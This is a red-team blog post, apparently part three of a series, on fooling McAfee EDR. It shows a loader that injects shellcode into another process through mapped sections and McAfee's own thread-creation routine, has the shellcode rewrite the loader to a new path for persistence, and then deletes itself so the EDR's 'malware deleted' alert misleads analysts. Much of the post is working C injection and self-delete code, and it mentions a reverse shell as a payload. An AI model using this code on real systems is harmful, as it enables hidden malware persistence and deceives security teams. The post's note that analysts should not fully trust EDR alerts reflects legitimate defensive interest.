原文始发于cyberwarfare:Blending with McAfee [Part-3]
Malwares are like parasites. They like to sit on other processes and perform malicious acts from there if possible. This behavior makes them hard to detect and stealthier because they mostly hide themselves inside the legitimate processes. They leverage one of the well-known, easiest and widely used WinAPI i.e., CreateRemoteThread (CRT) to inject themselves into other processes. Because of this AV/EDRs heavily monitor this API by every possible means such as userland-hooking, event monitoring, kernel monitoring etc.
While playing with McAfee EDR the initial plan was to bypass this EDR and somehow make CreateRemoteThread API work again because a normal call to CreateRemoteThread was detected as malicious. We found out McAfee hooks both the API CreateRemoteThread and CreateRemoteThreadEx however, it doesn’t hook the API NtCreateThreadEx in ntdll. We tried the NtCreateThreadEx API with excitement because it wasn’t hooked; however, our payload was detected and deleted every time. We tried every possible way to call CRT API but we failed every time. Below is all the test that we performed:
At this point we know that API call to CreateRemoteThread is not detected when internet/cloud protection is off and also with the local process handle it’s not detected.
if (cloud_protection_on && handle_in_CRT != -1) {
return process_is_malicious_perform_delete_action
}
We tried a few other things as well to make the CRT call not detectable but eventually failed. There are few other working ways to bypass both cloud and adaptive protection and execute our payload in a remote process. However, we insisted on using CRT no matter what obstacles came our way.
How exactly does McAfee EDR react to API call CreateRemoteThread?
In our loader/payload we dynamically located and called CreateRemoteThread which prevented McAfee EDR from detecting our payload/loader as malicious at Runtime. We delayed our program before calling CreateRemoteThread API for like 2 minutes. During that 2 minute nothing happened. After that, CreateRemoteThread was executed also the shellcode was executed normally in the remote process however within 10 – 12 seconds our loader/payload was detected as malicious and deleted immediately. Good thing is the shellcode was still running.
Abusing this behavior
Note: Before starting, we want you to make sure that this is not a bypass. The alert definitely will be generated and our payload/loader will still be deleted.
From the above section we know how McAfee behaves when CRT API is called. There are few things that we can take advantage of.
- Our injected shellcode still runs even the loader/payload is deleted
- There’s a time gap between the CRT execution and deletion of the loader/payload.
So, we came up with a plan to fool EDR and the analyst (not all ?). The plan is simple, since the EDR is so powerful most of us will trust the EDR most of the time. If we look at the logs carefully it says that it has deleted our loader/payload. Now the EDR is mentioning that it has deleted the malware. We’ll believe it if we are lazy ?. Our plan starts from here. We’ll simply move our shellcode and the loader into the target process memory. Then write our loader into the disk to another location before executing the actual shellcode functions. Finally self-destruct the executable. Basically, we’re hiding behind EDRs genuine alert. If we breakdown our plan:
Loader:
- Write shellcode and loader into the target process
- Execute CreateRemoteThread
- Wait 7 seconds (So that shellcode can write loader to another location in disk)
- Self-delete itself from the disk
Shellcode:
- Write Loader buffer from memory to disk in new location
- Update persistence mechanism (if implemented)
- Cleanup the loader buffer from memory
- Run other stuffs from shellcode for instance, reverse shell
Key Notes:
- Loader is written to the disk from shellcode because even if loader writes itself to another location and self-destructs, the EDR’s going to delete that newly created file by the Loader.
- Analyst will not find any trace of writing to disk by Loader if the loader buffer is written to disk from shellcode running in another process.
- Loader is self-destroyed before EDR deletes it. The Alert is still generated by saying malware is successfully deleted. Now it depends upon the analysts whether to dig into the incident or to believe EDR.
Implementation
Since we’re playing with McAfee EDR, we decided to use EDR-Recast technique [EDR-Recast link] as well. Also, to avoid WriteProcessMemory calls we used NtCreateSection and NtMapViewOfSection technique to write our shellcode and loader buffer into the remote process.
We created 2 sections one for shellcode and another for loader buffer. Loader buffer needs to be copied first then the shellcode because few things need to be copied along with shellcode in the shellcode section. During section creation for the loader buffer the MAXIMUM_ALLOWED flag should be given because our loader buffer is more than 4k in size.
Then we map the section in both local and remote processes. After that loader buffer is copied to the local section base address. Since both processes share the same section, whatever buffer is copied to the local section base address, remote section base address will also receive the same buffer.
// CreateSection for payload
SIZE_T actualSize = sizeof(buf) + sizeof(junks) + sizeof(ShellData);
SIZE_T scSize = sizeof(buf) + sizeof(junks) + sizeof(ShellData);
LARGE_INTEGER lScSize = { scSize };
// MAXIMUM_ALLOWED => this flags allows to create section larger than 4K
status = fpNtCreateSection(&hSection, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE | SECTION_EXTEND_SIZE | MAXIMUM_ALLOWED,
NULL, (PLARGE_INTEGER)&lScSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL);
if (!NT_SUCCESS(status)) {
perror("[+] Error on Creating Section\n");
exit(-1);
}
printf("[+] Section Created\n");
// Map view of section to local process
PVOID localSectionBaseAddr = { 0 };
PVOID remoteSectionBaseAddr = { 0 };
status = fpNtMapViewOfSection(hSection, GetCurrentProcess(), &localSectionBaseAddr, NULL, NULL, NULL, &scSize, ViewUnmap, NULL, PAGE_EXECUTE_READWRITE);
if (!NT_SUCCESS(status)) {
perror("[+] Error on NtMapViewOfSection Local\n");
exit(-1);
}
//DelayExecution(0x4);
printf("[+] Mapped view to local process\n");
CLIENT_ID pid;
InitializeObjectAttributes(&objAttr, NULL, 0, NULL, NULL);
pid.UniqueProcess = (HANDLE)(a_pid);
pid.UniqueThread = (HANDLE)0;
// Getting handle to target process
fpZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &objAttr, &pid);
if (hProcess == INVALID_HANDLE_VALUE) {
printf("[-] Invalid Handle Value \n");
}
printf("[+] Got handle to the process %d\n", (DWORD)hProcess);
//DelayExecution(0x6);
// Map view of section to target process //For shellcode RWX
status = fpNtMapViewOfSection(hSection, hProcess, &remoteSectionBaseAddr, NULL, NULL, NULL, &scSize, ViewUnmap, NULL, PAGE_EXECUTE_READ);
if (!NT_SUCCESS(status)) {
perror("[+] Error on NtMapViewOfSection Remote\n");
exit(-1);
}
printf("[+] Mapped view to remote process\n");
Same process is done for the shellcode however, we need to provide few information to the shellcode
- New path where we want to place our loader buffer
- Base address of loader buffer in memory i.e., base address of remote section
- Size of loader buffer
// [-- We created the section for shellcode but we'll not copy our shellcode
// there's something we need to add before copying shellcode --]
// CreateSection for payload buffer
// Getting payload and payload size
wchar_t payload_addr[0x100] = { 0 };
size_t len = 0;
mbstowcs_s(&len, payload_addr, argv[0], strlen(argv[0]));
wprintf(L"[+] Payload Name %s\n", payload_addr);
//system("pause");
size_t payload_size = 0;
BYTE* buffer = GetPayloadBuffer(payload_addr, payload_size);
SIZE_T p_size = payload_size;
//SIZE_T scSize = sizeof(buf) + sizeof(junks) + sizeof(ShellData);
lScSize = { p_size };
status = fpNtCreateSection(&pHSection, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE | SECTION_EXTEND_SIZE | MAXIMUM_ALLOWED,
NULL, (PLARGE_INTEGER)&lScSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL);
if (!NT_SUCCESS(status)) {
perror("[+] Error on Creating Section\n");
exit(-1);
}
printf("[+] Section Created\n");
//DelayExecution(0x2);
// Map view of section to local process
PVOID localPESectionBaseAddr = { 0 };
PVOID remotePESectionBaseAddr = { 0 };
status = fpNtMapViewOfSection(pHSection, GetCurrentProcess(), &localPESectionBaseAddr, NULL, NULL, NULL, &p_size, ViewUnmap, NULL, PAGE_EXECUTE_READWRITE);
if (!NT_SUCCESS(status)) {
perror("[+] Error on NtMapViewOfSection Local\n");
exit(-1);
}
printf("[+] Mapped view to local process\n");
// Map view of section to target process //For shellcode RWX
status = fpNtMapViewOfSection(pHSection, hProcess, &remotePESectionBaseAddr, NULL, NULL, NULL, &p_size, ViewUnmap, NULL, PAGE_EXECUTE_READ);
if (!NT_SUCCESS(status)) {
perror("[+] Error on NtMapViewOfSection Remote\n");
exit(-1);
}
printf("[+] Mapped view to remote process\n");
printf("[+] Copying PE to mapped section...\n");
memcpy((void*)localPESectionBaseAddr, buffer, payload_size);
Since we are calling the CreateRemoteThread API we can pass the parameter (lpParameter) to the thread function (shellcode/StartAddress). However, we need to pass multiple information to the shellcode. To solve this issue, we created the structure “XShellData” which has 3 members: new_path, mem_loc, copy_size.
- new_path: new path location to move loader buffer
- mem_loc: loader buffer memory location
- copy_size: number of bytes to copy (size of loader buffer)
Heap is allocated with the size of (shellcode + junks + XShellData). Once the shellcode, junk bytes and the XShellData is copied to the heap, the data in heap will be copied to the local section address created for shellcode. Now the shellcode and buffer in XShellData are copied to the remote section base address as well. Now it’s time to call CreateRemoteThread API, for lpStartAddress remote base address of shellcode is given and for lpParameter remote base address of XShellData is given i.e., remote base address + sizeof(shellcode) + sizeof(junks).
// setting up parameters
char newPath[0x100] = "";
// This is the path where we move our shellcode. This path can be dynamically
// generated or can be encrypted for stealthier.
// TODO: Finding Random Directory with RWX permission
// TODO: Generate Random name for the payload
strcat_s(newPath, "C:\\Users\\Xploiter\\AppData\\Local\\Temp\\test.exe");
strcpy_s(ShellData.new_path, newPath);
ShellData.mem_loc = remotePESectionBaseAddr;
ShellData.copy_size = payload_size;
memcpy((void*)((UINT_PTR)heapAddr + sizeof(buf) + sizeof(junks)), &ShellData, sizeof(ShellData));
printf("[+] Copying payload to mapped section...\n");
memcpy((void*)localSectionBaseAddr, heapAddr, actualSize);
// Patching Global for CRT
DWORD CUTPatchAddr = ((ULONG_PTR)hMfehcinj + CUT);
DWORD CUTPatchBytes = 0x0;
DWORD CRTPatchAddr = ((ULONG_PTR)hMfehcinj + CRT);
pResolveProcAddress("kernel32.dll", "CreateRemoteThreadEx", &procAddr);
DWORD CRTPatchBytes = (DWORD)procAddr;
memcpy((void*)CUTPatchAddr, &CUTPatchBytes, sizeof(DWORD));
memcpy((void*)CRTPatchAddr, &CRTPatchBytes, sizeof(DWORD));
LPTHREAD_START_ROUTINE runME = (LPTHREAD_START_ROUTINE)remoteSectionBaseAddr;
printf("[+] Executing...\n");
//Crafting Remote Thread
CreateUserOrRemoteThread createUserOrRemoteThread = (CreateUserOrRemoteThread)((UINT_PTR)hMfehcinj + CURTFunc);
// param location offset
DWORD param = sizeof(buf) + sizeof(junks);
createUserOrRemoteThread((void*)hProcess, (void*)remoteSectionBaseAddr, (void*)((UINT_PTR)remoteSectionBaseAddr + param));
// Self-destruct
// https://stackoverflow.com/questions/1606140/how-can-a-program-delete-its-own-executable/66847136#66847136
// alternatively we can put our binary
// in delete-pending state
char* process_name = argv[0];
char delCommand[256] = "start /min cmd /c del ";
strcat_s(delCommand, process_name);
// Delaying before self-destruct so that shellcode can move the binary to other location
printf("[+] Delaying Before self-destruct...\n");
DelayExecution(0x7);
printf("[+] Attempting to delete itself...\n");
system(delCommand);
Following is the visualization of how shellcode, junks, and XShellData are aligned in memory.
Now in shellcode, the parameter (base address of XShellData) that is passed from CRT is at esp + 8. From there shellcode will parse all 3 members new_path, mem_loc, copy_size. And writes loader to a new location after that other functionality will be executed.
Video : https://drive.google.com/file/d/1Tt-BtjzQOSqaBgGw8dhY0gR4SuazXLsy/view
Project Link : https://github.com/RedTeamOperations/Journey-to-McAfee/tree/main/TrueAlert
Conclusion
Almost all the EDRs perform behavioral analysis to detect the malware which makes red teamers/threat actors very difficult to perform their action. Usually most of our favorite techniques are detected by AV/EDRs no matter what. It’s quite difficult to bypass EDRs these days, however we can also perform behavioral analysis on EDR and craft special payload/malware to specific EDR like we did in this blog. Also, security analysts shouldn’t fully trust the EDR even though it’s very powerful. Usually unexpected things happen in powerful places.